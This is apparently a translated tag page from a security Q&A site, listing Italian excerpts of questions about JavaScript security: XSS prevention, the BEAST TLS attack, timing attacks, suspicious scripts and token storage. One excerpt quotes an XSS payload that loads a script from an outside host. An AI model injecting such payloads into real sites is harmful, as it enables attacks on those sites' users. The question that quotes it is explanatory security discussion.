Domande con tag 'javascript'

domande con tag
6
risposte

Soluzione per consentire l'input JavaScript ma prevenire XSS

Abbiamo un semplice sistema Blog che consente agli utenti di inserire HTML e JavaScript per creare una pagina del blog. Sono consapevole del fatto che consentire JavaScript apre la porta agli attacchi xss. Tuttavia, dobbiamo consentire agli uten...
posta 30.06.2011 - 09:20
3
risposte

Quanto sono gravi gli attacchi XSS

Un sito web che visito consente questo tipo di attacco, da implementare con GET nell'URL <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Insieme a molti altri su questa pagina: link Il sito richiede un account (di solito a...
posta 21.10.2011 - 17:43
5
risposte

Che cosa posso fare sulla vulnerabilità di TLS 1.0 javascript injection sul mio server?

Il recente articolo pubblicato su slashdot link afferma che le connessioni protette con TLS 1.0 sono suscettibili alla decifrazione man-in-the-middle (l'exploit BEAST). Ho un'app ospitata su Google Appengine, che sembra utilizzare TLS 1.0. Fa...
posta 22.09.2011 - 15:14
1
risposta

Come può essere usato SharedArrayBuffer per gli attacchi di temporizzazione?

Since this new class of attacks involves measuring precise time intervals, as a partial, short-term, mitigation we are disabling or reducing the precision of several time sources in Firefox. The precision of performance.now() has been reduced...
posta 08.01.2018 - 06:32
6
risposte

Come convalidare se una libreria JavaScript è sicura?

Sono lo sviluppatore principale di una libreria JavaScript Open Source. Quella libreria viene utilizzata nell'azienda per cui lavoro, per diversi clienti. Ogni tanto c'è un cliente che si sente paranoico nell'implementare una biblioteca di cui n...
posta 26.10.2012 - 03:02
3
risposte

Quanto è sicuro aSSL (javascript)? Simula efficacemente SSL?

Alcuni di voi potrebbero avere familiarità con il progetto aSSL, che utilizza AJAX / PHP per imitare il protocollo SSL. Utilizza RSA 512 o 1024 per le chiavi e AES per i dati effettivi. Mi sembra impressionante nel concetto, ma sono curioso di v...
posta 23.11.2012 - 14:43
4
risposte

Che cosa fa questo file javascript? È un virus?

Durante la ricerca su Google ho trovato un sito Web che mostra un insieme di contenuti per Google Bot e un altro per gli utenti (reindirizzando verso un nuovo dominio) e anche un file Javascript molto sospetto. Forse è un cookie di tracciamento...
posta 04.09.2014 - 10:46
2
risposte

Cordova / PhoneGap: RefreshToken in localstorage

Io sono (in parte) seguendo un tutorial per sviluppare un'app cordova, basata su angularJS. L'autore memorizza il token di aggiornamento nella memoria locale , che è stata considerata una pratica molto negativa in uno i commenti su quello ste...
posta 29.10.2014 - 10:00
2
risposte

UTF-7 XSS attacchi nei browser moderni

Recentemente ho letto l'articolo Ned Batchelders sugli attacchi XSS UTF-7 . Ho provato i suoi esempi , ma non ho potuto ottenere alcun attacco UTF-7 per funzionare nei browser moderni. Ho provato le versioni recenti di Firefox, Chrome e Safari...
posta 22.12.2013 - 10:02
3
risposte

Quali cattive pratiche di codifica rendono vulnerabile un'estensione del browser?

Sto cercando di scansionare i file JavaScript per le vulnerabilità usando JSHint. Nello specifico, sto eseguendo la scansione dei file JavaScript delle estensioni del browser. Per cercare possibili vulnerabilità, sto cercando cattive pratiche di...
posta 11.04.2013 - 06:28